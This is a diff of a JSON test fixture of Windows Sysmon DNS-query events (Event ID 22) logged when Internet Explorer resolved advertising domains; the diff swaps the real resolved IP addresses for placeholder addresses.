dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6792,7 +6792,7 @@ { "@timestamp": "2021-05-05T15:30:51.710Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6821,7 +6821,7 @@ "ProcessId": "2736", "QueryName": "secure.adnxs.com", "QueryStatus": "0", - "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;" + "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;" }, "event_id": "22", "provider_name": "Microsoft-Windows-Sysmon", 
@@ -6838,7 +6838,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6864,7 +6864,7 @@ "event_data": { "QueryName": "tps.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.478", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6880,7 +6880,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, 
@@ -6890,7 +6890,7 @@ "event_data": { "QueryName": "i.liadm.com", "QueryStatus": "0", - "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.536", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6923,7 +6923,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
@@ -6940,7 +6940,7 @@ "time_created": "2019-07-18T03:34:09.067Z", "level": "information", "event_data": { - "QueryResults": "::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.544", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6963,7 +6963,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6975,7 +6975,7 @@ "ProcessId": "2736", "QueryName": "router.infolinks.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "opcode": "Info", @@ -7019,7 +7019,7 @@ "ProcessId": "2736", "QueryName": "grey.erne.co", "QueryStatus": "0", - "QueryResults": "::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.552", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -7035,7 +7035,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
